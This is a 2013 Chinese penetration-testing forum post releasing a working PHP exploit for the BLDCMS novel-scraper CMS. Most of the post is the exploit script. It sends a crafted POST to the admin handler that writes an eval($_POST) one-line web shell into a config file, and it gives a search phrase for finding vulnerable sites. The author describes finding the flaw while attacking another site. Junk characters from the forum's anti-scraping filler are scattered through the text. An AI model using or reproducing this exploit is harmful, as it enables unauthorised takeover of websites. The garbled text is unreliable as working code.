中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
7 `, I9 v0 Q$ _3 S+ t- D- z- B
' u0 c9 L2 n% B
; h' A! x5 z# E+ M* u
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
" c) b, T( g9 K `6 N: A! |
5 u- Q" W! a) A* j- j7 N6 e" L$ R; o/ h
既然都有人发了 我就把我之前写好的EXP放出来吧
+ m# |, A3 M9 f: j0 X# M. l
* Q( n6 E8 h+ a/ ^, J- _7 S# m
view source print?01.php;">
3 R; M1 s u2 v
02.<!--?php
$ {% _: p9 w: G0 |/ _; p' l
03.echo "-------------------------------------------------------------------
0 P# ~# h, t/ A: D7 `
04.
0 L; v% O7 F# a( g& o
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
+ u2 R3 K2 C* o1 x, j+ t! Z: ]; t
06.
0 ^6 A" c( h' r* S c
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
( M6 _+ `9 ?! i9 \ Y
08.
1 O0 X& G, o$ L" D
09.QQ:981009941\r\n 2013.3.21\r\n
6 |0 k2 q% l& i: g
10.
; E0 H- M: h: o/ z0 Z4 G
11.
& d* ], k, \& Z! G
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
% s% E$ j$ T4 S+ \/ N
13.
6 ]/ h8 K; M& M) @2 _
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
. O) r- d5 p$ G9 G) D1 N
15.
9 _7 v% l' E4 x$ x1 H% g
16.--------------------------------------------------------------------\r\n";
) | P/ A( D0 m
17.$url=$argv[1];
2 c% \" o" `4 {8 }( P" u3 g5 O
18.$dir=$argv[2];
: Z% k, R- j: }" T1 c' s: U
19.$pass=$argv[3];
; L1 ^: r3 u4 ]0 F9 x
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
. \ l! _7 S) \8 V1 d% q* q. u
21.if (emptyempty($pass)||emptyempty($url))
' p8 O0 n" L6 @% P# o
22.{exit("请输入参数");}
) S) ?0 U9 c; f/ Z H1 M
23.else
* u: M2 D9 N4 F6 @2 j4 p# r& U0 S. i
24.{
& K' \4 Z1 ^$ |4 E( K( y
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
$ p- r7 V' ]5 Q* Q) L
26.
9 q/ ^1 N- s8 p4 }' \6 Q
27.al;
3 B' X7 Z0 Q( b+ e, i8 n
28.$length = strlen($fuckdata);
3 j9 f/ i- |9 F& f4 w
29.function getshell($url,$pass)
$ }. o1 j" L$ M% l0 C
30.{
0 g4 {2 Q( {3 F" E- H
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
: E! E4 n8 U* L) L
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
3 G6 \3 {) {& c9 n3 t; Z2 [
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
2 X8 j' t9 O! s( @
34.$header .= "User-Agent: MSIE\r\n";
+ {! Q. J8 l1 w. q
35.$header .= "Host:".$url."\r\n";
6 H& W8 ?* d" a9 M s' E$ K
36.$header .= "Content-Length: ".$length."\r\n";
( |& M5 T0 O4 n* O
37.$header .= "Connection: Close\r\n";
1 z6 J3 S2 \1 }1 j* b, j$ ~6 L
38.$header .="\r\n";
( t6 i) `1 q2 i+ a+ T/ ]5 b) K
39.$header .= $fuckdata."\r\n\r\n";
5 r4 {+ d$ b0 H( b6 |& @
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
9 q) C& z% P- n- b
41.if (!$fp)
2 Q. e& b" G4 E% M8 A, y% U' _
42.{
( z! O) q3 Y4 ?: \9 h. \
43.exit ("利用失败:请检查指定目标是否能正常打开");
4 D1 z* X7 W' U* Q
44.}
" g$ X6 k8 w% H" e: Q
45.else{ if (!fputs($fp,$header))
# A! c$ L" A3 G- s- `$ O# x
46.{exit ("利用失败");}
( }5 P8 I4 ]9 O- v
47.else
! L, g! g. B3 B+ v
48.{
2 o! W9 E3 s0 g
49.$receive = '';
' P' s6 C% x1 w4 M* C8 {/ b }
50.while (!feof($fp)) {
1 o7 K/ A" Q$ L2 t% z
51.$receive .= @fgets($fp, 1000);
) i3 U* ]: V9 `; r! e" Q
52.}
9 d; \+ A3 B, u, d1 w* d" U4 p
53.@fclose($fp);
/ B9 k8 |1 ]' H9 X* }6 p
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
6 ?, p. K% O2 C8 p) {
55.
* e5 m& n8 E F. ^! O" E
56.GPC是否=off)";
! Z+ h2 C* z1 s B, K, p. E J4 T2 d
57.}}
. t6 m5 l- o% p- K* G0 R- t W
58.}
t$ O p* F2 K+ P( N: L6 J
59.}
. X. Z2 ?! y; t8 o
60.getshell($url,$pass);
T) c& G5 l W, j) L# N. V& C
61.?-->
6 u- Q; X0 _) C- U
0 p, W: G0 \- v8 g/ Y
4 R. O2 h) l+ L1 l: E! U
2 e: `! H k y# |
by 数据流
9 M; d" p2 j# e1 k# A! U
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2